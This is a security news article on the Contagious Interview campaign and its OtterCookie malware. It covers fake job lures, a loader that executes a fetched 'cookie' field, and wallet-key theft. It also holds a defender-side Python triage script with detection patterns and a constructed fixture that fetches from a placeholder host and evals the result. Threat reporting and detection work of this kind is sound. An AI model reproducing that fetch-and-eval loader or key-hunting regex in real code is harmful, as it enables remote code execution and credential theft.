Contagious Interview campaign infects devs with OtterCookie

January 13, 2025

A group of alleged North Korean hackers is operating the Contagious Interview campaign, which targets software developers to infect them with a novel malware called OtterCookie.

Reports indicate that the campaign has been active since at least December 2022. It lures software developers with fake job offers in order to deliver malware; earlier operations distributed strains such as BeaverTail and InvisibleFerret.

Recent research, however, shows that the Contagious Interview operation now uses a new strain, most likely first deployed in September.

The Contagious Interview campaign deploys the OtterCookie malware via a loader.

According to the investigation, the Contagious Interview campaign launches the newly uncovered OtterCookie malware through a loader that retrieves JSON data and executes the value of its ‘cookie’ attribute as JavaScript code.

The researchers also noted that OtterCookie has appeared in only some incidents, since BeaverTail remains the payload the campaign operators deploy most often.

The loader reaches targets through Node.js projects or npm packages that the attackers obtain from GitHub or Bitbucket. More recently, files built as Qt or Electron applications have also been used.

Further assessment of the campaign showed that the attackers used shell commands to harvest data, including Bitcoin wallet keys, documents, photos, and other valuable information. The September version of OtterCookie already included built-in capabilities for stealing cryptocurrency wallet keys.

Furthermore, the researchers disclosed that the checkForSensitiveData function used regular expressions to look for Ethereum private keys. In the November variant, however, the threat actors replaced that approach with remote shell commands.
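A defender-side triage heuristic for the two behaviours described above, the fetch-JSON-then-execute-the-‘cookie’-attribute loader and the 64-hex private-key regex in checkForSensitiveData. This is an added illustration, not code from the report or from the malware; the indicator names, weights, verdict rule and both fixture files are this example's own assumptions.

```python
"""Static triage of JavaScript files in a Node.js project for the OtterCookie
loader shape (remote JSON -> 'cookie' attribute -> dynamic execution) and for
a regex sized to match 64-hex-character keys. Weights and thresholds are assumed."""
import re

# (indicator name, regex applied to JavaScript source text, weight)
INDICATORS = [
    ("remote_fetch", re.compile(r"\b(?:axios\.(?:get|post)|fetch|https?\.(?:get|request))\s*\("), 1),
    ("json_parse", re.compile(r"\bJSON\.parse\s*\("), 1),
    ("cookie_attr", re.compile(r"(?:\.cookie\b|\[\s*['\"]cookie['\"]\s*\])"), 1),
    ("dynamic_exec", re.compile(r"\b(?:eval|new\s+Function|vm\.runIn\w+Context)\s*\("), 3),
    ("hex64_regex", re.compile(r"\[0-9a-fA-F\]\{64\}"), 2),  # regex literal for a 64-hex key
]

def triage(source: str) -> dict:
    """Return matched indicators, a weighted score and a verdict for one file."""
    hits = {}
    for name, pattern, _ in INDICATORS:
        count = len(pattern.findall(source))
        if count:
            hits[name] = count
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    # document.cookie alone is ordinary browser code; only the full fetch -> cookie -> execute
    # chain is reported as the loader pattern, while any dynamic execution still warrants review
    if {"remote_fetch", "cookie_attr", "dynamic_exec"}.issubset(hits):
        verdict = "suspicious"
    elif "dynamic_exec" in hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hits": hits, "score": score, "verdict": verdict}

# Constructed fixture shaped like the described loader; inert placeholder host, not real malware.
SUSPICIOUS_FIXTURE = """
const axios = require('axios');
const keyRe = /[0-9a-fA-F]{64}/;
axios.get('https://config.example.invalid/data').then(r => {
  const data = JSON.parse(JSON.stringify(r.data));
  eval(data.cookie);
});
"""

# Constructed fixture: ordinary browser code that reads a cookie and posts JSON.
BENIGN_FIXTURE = """
const prefs = JSON.parse(decodeURIComponent(document.cookie.split('=')[1] || '{}'));
fetch('/api/prefs', { method: 'POST', body: JSON.stringify(prefs) });
"""
```

Run it over every .js file in a freshly cloned "coding exam" repository before executing anything; a "suspicious" verdict is a reason to stop, not a proof of compromise.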

The most recent version of OtterCookie can also exfiltrate clipboard contents, which may hold sensitive data, to the threat actors. Commands commonly used for reconnaissance, such as ‘ls’ and ‘cat’, were also observed, indicating that the alleged North Korean hackers intend to survey the environment and prepare it for further compromise or lateral movement.

The emergence of this new malware and the diversification of infection methods show that the threat actors behind the Contagious Interview campaign are experimenting with alternative and novel tactics. Software developers should therefore treat unsolicited job offers with caution and independently verify information about the prospective employer.

Lastly, avoid running code on home or business devices as part of a job offer that includes a coding exam.
